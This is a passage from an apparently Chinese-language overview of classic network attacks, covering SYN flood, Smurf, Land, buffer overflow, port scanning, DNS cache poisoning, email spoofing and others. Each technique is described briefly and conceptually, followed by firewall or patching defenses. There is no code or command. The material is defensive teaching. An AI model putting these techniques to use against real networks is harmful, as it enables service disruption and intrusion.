    概览:各种各样的假冒攻击利用简单的TCP/IP服务,如Chargen和Echo来传送毫无用处的占满带宽的数据。通过伪造与某一主机的Chargen服务之间的一次的UDP连接,回复地址指向开着Echo服务的一台主机,这样就生成在两台主机之间的足够多的无用数据流,如果足够多的数据流就会导致带宽的服务攻击。

    防御:关掉不必要的TCP/IP服务,或者对防火墙进行配置阻断来自Internet的请求这些服务的UDP请求。

    SYN洪水(SYN flood)

    概览:一些TCP/IP栈的实现只能等待从有限数量的计算机发来的ACK消息,因为他们只有有限的内存缓冲区用于创建连接,如果这一缓冲区充满了虚假连接的初始信息,该服务器就会对接下来的连接停止响应,直到缓冲区里的连接企图超时。在一些创建连接不受限制的实现里,SYN洪水具有类似的影响。

    防御:在防火墙上过滤来自同一主机的后续连接。

    未来的SYN洪水令人担忧,由于释放洪水的并不寻求响应,所以无法从一个简单高容量的传输中鉴别出来。
    Land攻击

    概览:在Land攻击中,一个特别打造的SYN包它的原地址和目标地址都被设置成某一个服务器地址,此举将导致接受服务器向它自己的地址发送SYN-ACK消息,结果这个地址又发回ACK消息并创建一个空连接,每一个这样的连接都将保留直到超时掉,对Land攻击反应不同,许多UNIX实现将崩溃,NT变的极其缓慢(大约持续五分钟)。

    防御:打最新的补丁,或者在防火墙进行配置,将那些在外部接口上入站的含有内部源地址滤掉。(包括10域、127域、192.168域、172.16到172.31域)。

    Smurf攻击

    概览:一个简单的smurf攻击通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包来淹没受害主机的方式进行,最终导致该网络的所有主机都对此ICMP应答请求作出答复,导致网络阻塞,比pingof death洪水的流量高出一或两个数量级。更加复杂的Smurf将源地址改为第三方的受害者,最终导致第三方雪崩。

    防御:为了防止黑客利用你的网络攻击他人,关闭外部路由器或防火墙的广播地址特性。为防止被攻击,在防火墙上设置规则,丢弃掉ICMP包。

    Fraggle攻击

    概览:Fraggle攻击对Smurf攻击作了简单的修改,使用的是UDP应答消息而非ICMP。

    防御:在防火墙上过滤掉UDP应答消息。

    电子邮件炸弹

    概览:电子邮件炸弹是最古老的匿名攻击之一,通过设置一台机器不断的大量的向同一地址发送电子邮件,攻击者能够耗尽接受者网络的带宽。

    防御:对邮件地址进行配置,自动删除来自同一主机的过量或重复的消息。

    畸形消息攻击

    概览:各类操作系统上的许多服务都存在此类问题,由于这些服务在处理信息之前没有进行适当正确的错误校验,在收到畸形的信息可能会崩溃。

    防御:打最新的服务补丁。

    2、利用型攻击

    利用型攻击是一类试图直接对你的机器进行控制的攻击,最常见的有三种:

    口令猜测

    概览:一旦黑客识别了一台主机而且发现了基于NetBIOS、Telnet或NFS这样的服务的可利用的用户帐号,成功的口令猜测能提供对机器控制。

    防御:要选用难以猜测的口令,比如词和标点符号的组合。确保像NFS、NetBIOS和Telnet这样可利用的服务不暴露在公共范围。如果该服务支持锁定策略,就进行锁定。

    特洛伊木马

    概览:特洛伊木马是一种或是直接由一个黑客,或是通过一个不令人起疑的用户秘密安装到目标系统的程序。一旦安装成功并取得管理员权限,安装此程序的人就可以直接远程控制目标系统。

    最有效的一种叫做后门程序,恶意程序包括:NetBus、BackOrifice和BO2k,用于控制系统的良性程序如:netcat、VNC、pcAnywhere。理想的后门程序透明运行。

    防御:避免下载可疑程序并拒绝执行,运用网络扫描软件定期监视内部主机上的监听TCP服务。

    缓冲区溢出

   概览:由于在很多的服务程序中大意的程序员使用象strcpy(),strcat()类似的不进行有效位检查的函数,最终可能导致恶意用户编写一小段利用程序来进一步打开安全豁口然后将该代码缀在缓冲区有效载荷末尾,这样当发生缓冲区溢出时,返回指针指向恶意代码,这样系统的控制权就会被夺取。

    防御:利用SafeLib、tripwire这样的程序保护系统,或者浏览最新的安全公告不断更新操作系统。

    3、信息收集型攻击

    信息收集型攻击并不对目标本身造成危害,如名所示这类攻击被用来为进一步入侵提供有用的信息。主要包括:扫描技术、体系结构刺探、利用信息服务。

    扫描技术

    地址扫描

   概览:运用ping这样的程序探测目标地址,对此作出响应的表示其存在。

    防御:在防火墙上过滤掉ICMP应答消息。

    端口扫描

    概览:通常使用一些软件,向大范围的主机连接一系列的TCP端口,扫描软件报告它成功的建立了连接的主机所开的端口。

    防御:许多防火墙能检测到是否被扫描,并自动阻断扫描企图。

    反响映射

    概览:黑客向主机发送虚假消息,然后根据返回“hostunreachable”这一消息特征判断出哪些主机是存在的。目前由于正常的扫描活动容易被防火墙侦测到,黑客转而使用不会触发防火墙规则的常见消息类型,这些类型包括:RESET消息、SYN-ACK消息、DNS响应包。

    防御:NAT和非路由代理服务器能够自动抵御此类攻击,也可以在防火墙上过滤“hostunreachable”ICMP应答。

    慢速扫描

    概览:由于一般扫描侦测器的实现是通过监视某个时间桢里一台特定主机发起的连接的数目(例如每秒10次)来决定是否在被扫描,这样黑客可以通过使用扫描速度慢一些的扫描软件进行扫描。

    防御:通过引诱服务来对慢速扫描进行侦测。

    体系结构探测

    概览:黑客使用具有已知响应类型的数据库的自动工具,对来自目标主机的、对坏数据包传送所作出的响应进行检查。由于每种操作系统都有其独特的响应方法(例NT和Solaris的TCP/IP堆栈具体实现有所不同),通过将此独特的响应与数据库中的已知响应进行对比,黑客经常能够确定出目标主机所运行的操作系统。

    防御:去掉或修改各种BANNer,包括操作系统和各种应用服务的,阻断用于识别的端口扰乱对方的攻击计划。
利用信息服务

    DNS域转换

    概览:DNS协议不对转换或信息性的更新进行身份认证,这使得该协议被人以一些不同的方式加以利用。如果你维护着一台公共的DNS服务器,黑客只需实施一次域转换操作就能得到你所有主机的名称以及内部IP地址。

   防御:在防火墙处过滤掉域转换请求。

    Finger服务

    概览:黑客使用finger命令来刺探一台finger服务器以获取关于该系统的用户的信息。

    防御:关闭finger服务并记录尝试连接该服务的对方IP地址,或者在防火墙上进行过滤。

    LDAP服务

    概览:黑客使用LDAP协议窥探网络内部的系统和它们的用户的信息。

    防御:对于刺探内部网络的LDAP进行阻断并记录,如果在公共机器上提供LDAP服务,那么应把LDAP服务器放入DMZ。

    4、假消息攻击

    用于攻击目标配置不正确的消息,主要包括:DNS高速缓存污染、伪造电子邮件。

    DNS高速缓存污染

    概览:由于DNS服务器与其他名称服务器交换信息的时候并不进行身份验证,这就使得黑客可以将不正确的信息掺进来并把用户引向黑客自己的主机。

    防御:在防火墙上过滤入站的DNS更新,外部DNS服务器不应能更改你的内部服务器对内部机器的认识。

    伪造电子邮件

    概览:由于SMTP并不对邮件的发送者的身份进行鉴定,因此黑客可以对你的内部客户伪造电子邮件,声称是来自某个客户认识并相信的人,并附带上可安装的特洛伊木马程序,或者是一个引向恶意网站的连接。

    防御:使用PGP等安全工具并安装电子邮件证书。